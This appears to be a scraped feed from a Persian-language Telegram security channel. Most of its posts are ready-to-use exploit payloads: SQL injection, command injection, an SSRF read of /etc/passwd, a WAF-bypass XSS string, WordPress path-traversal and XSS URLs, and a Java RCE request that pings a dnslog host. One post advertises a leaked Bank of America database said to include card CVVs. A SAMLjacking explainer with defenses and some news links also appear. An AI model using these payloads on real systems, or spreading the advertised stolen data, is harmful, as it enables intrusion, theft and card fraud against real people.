P.F.K Security
1.61K subscribers
128 photos
38 videos
37 files
404 links
APT / Exploit / Malware / ICS / OT / Vulnerability Analysis / SE
Download Telegram
SpringBlade SQL

GET /api/blade-desk/notice/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1

#exploit #poc #SQL
@pfksecurity
CVE-2024-7436

GET /msp_info.htm?flag=cmd&cmd=payload /1.1
Host: {{Host}}
Cookie: {{Cookie}}

payload

#exploit #poc #IoT
@pfksecurity
این را در مورد CSAM می‌گوید، اما تمام پیازها را در موتور جستجوی خود که هنوز CSAM دارند، حتی اگر قابل جستجو نباشد، فاش می‌کند. لطفا از Ahmia استفاده نکنید.

https://ahmia.fi/onions/
@pfksecurity
BNKoFAmerica.txt
120.4 MB
پایگاه داده 4.8 میلیون کاربر متعلق به Bank Of America

- شناسه کاربری، نام کامل، موجودی، تاریخ انقضا، نوع حساب، CVV
@PfkSecurity
Xss Bypass Waf

<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//

@PfkSecurity
CVE-2024-6095

POST /models/apply HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json

{"url":"file:///etc/passwd"}

#exploit #poc

@PfkSecurity
افزونه های وردپرس
____
simple-image-manipulator
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd

activehelper-livehelp
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

amministrazione-aperta
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd

anti-plagiarism
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

buddypress-component-stats
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd

dzs-videogallery
/wp-content/plugins/dzs-videogallery/admin/upload.php

e-search
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

fancy-product-designer
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php

hd-webplayer
/wp-content/plugins/hd-webplayer/playlist.php

localize-my-post
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd


@PfkSecurity
CVE-2024-0195 Exploit

POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B

#exploit #poc
@PfkSecurity
زمان مغز بزرگ

دانیل راین به عنوان مهندس زیرساخت اصلی برای یک شرکت ناشناس استخدام شد. او عمداً اعتبار کنترلر دامنه را تغییر داد تا از کارفرمایش 750000 دلار اخاذی کند.

او اکنون با 30 سال زندان مواجه است.

https://www.bleepingcomputer.com/news/security/employee-arrested-for-locking-windows-admins-out-of-254-servers-in-extortion-plot/

@PfkSecurity
🔺 امنیت تهاجمی باعث ایجاد امنیت دفاعی می شود 🔻
در اینجا مجموعه‌ای از تکنیک‌های حمله SaaS به اشتراک گذاشته شده تا به مدافعان کمک کند تا تهدیداتی را که با آن مواجه می‌شوند درک کنند

🟣 https://github.com/pushsecurity/saas-attacks

🔷 این پروژه مجموعه‌ای از تکنیک‌های حمله مختص به Software as a service (SaaS) را معرفی می‌کند و با استفاده از چارچوب‌ MITRE ATT&CK، به تحلیل تهدیدات امنیتی در محیط‌های SaaS میپردازد.


#Saas
#APT

@PfkSecurity
P.F.K Security
🔺 امنیت تهاجمی باعث ایجاد امنیت دفاعی می شود 🔻 در اینجا مجموعه‌ای از تکنیک‌های حمله SaaS به اشتراک گذاشته شده تا به مدافعان کمک کند تا تهدیداتی را که با آن مواجه می‌شوند درک کنند 🟣 https://github.com/pushsecurity/saas-attacks 🔷 این پروژه مجموعه‌ای از تکنیک‌های…
🔺 تکنیک SAMLjacking یکی از روش های حملات فیشینگ است که روی قابلیت SSO (Single Sign-On) که اغلب در پلتفرم‌های SaaS (نرم‌افزار به عنوان سرویس) استفاده می‌شود، تمرکز دارد
در این نوع حمله، مهاجمان از اعتماد کاربران به فرآیندهای SSO سوءاستفاده می‌کنند تا به‌طور غیرمجاز به سیستم‌های یک شرکت دسترسی پیدا کنند.

⭕️ مراحل حمله:

مهاجم ابتدا یک حساب کاربری جدید در یک پلتفرم SaaS ایجاد می‌کند. این پلتفرم‌ها معمولاً شامل ابزارهای مختلفی هستند که شرکت‌ها برای مدیریت فعالیت‌های خود استفاده می‌کنند
💢 مانند Miro، Office 365، یا سایر خدمات مشابه.

⭕️ تنظیمات اولیه:
پس از ثبت‌نام، مهاجم می‌تواند تنظیمات مختلف حساب را پیکربندی کند. یکی از این تنظیمات مهم، پیکربندی URL مربوط به SSO (احراز هویت یکپارچه) است.
💢 این آدرسی است که سرویس‌های SSO برای احراز هویت کاربران از آن استفاده می‌کنند. مهاجم می‌تواند این URL را طوری تنظیم کند که به یک سرور تحت کنترل خود اشاره کند و عملیات فیشینگ را کامل کند

📩 مهاجم می‌تواند دعوت‌نامه‌هایی برای پیوستن به این "حساب جدید شرکتی" ارسال کند. این دعوت‌نامه‌ها به کاربران جدید یا اعضای بالقوه شرکت ارسال می‌شود.
📮 دعوت‌نامه‌ها به‌طور معمول از دامنه‌ای به نظر می‌رسد که قانونی و معتبر است (از دامنه سرویس‌دهنده SaaS).
📌 اگر مهاجم در ابتدا از یک URL سرویسی که به نظر قانونی است استفاده کند و سپس URL SSO را به سرور خود تغییر دهد، کاربران ممکن است فکر کنند که URL SSO تغییر نکرده و بدون شک به ورود ادامه دهند.

⚠️ راهکارهای مقابله:
🔰آگاهی و آموزش: آموزش کارکنان، به‌ویژه کارکنان جدید، در مورد ریسک‌های حملات فیشینگ و چگونگی شناسایی دعوت‌نامه‌های مشکوک

🔰 پیکربندی SSO: اطمینان از اینکه پیکربندی‌های SSO به‌طور دقیق کنترل و نظارت می‌شوند. هر گونه تغییر در URL‌های SSO باید بازبینی و تأیید شود.
🔰 ابزارهای پیشگیری از فیشینگ: استفاده از ابزارهای پیشرفته پیشگیری از فیشینگ که می‌توانند ایمیل‌ها یا لینک‌های مخرب را قبل از رسیدن به کارکنان شناسایی و مسدود کنند.
🔰 ممیزی SSO: انجام ممیزی‌های منظم روی پیکربندی‌ها و لاگ‌های SSO برای شناسایی هرگونه تغییر غیرمجاز یا فعالیت مشکوک.

👁‍🗨 https://www.youtube.com/watch?v=4gAeSxbycXU
📚 https://pushsecurity.com/blog/samljacking-a-poisoned-tenant/

#Initial_Access
#APT
REMnux
یک جعبه ابزار لینوکس برای تحلیلگران بدافزار
https://remnux.org/
@PfkSecurity
Tricky ASP blind SQL Injection in a login page.
Payload👇
';%20waitfor%20delay%20'0:0:6'%20--%20
@pfksecurity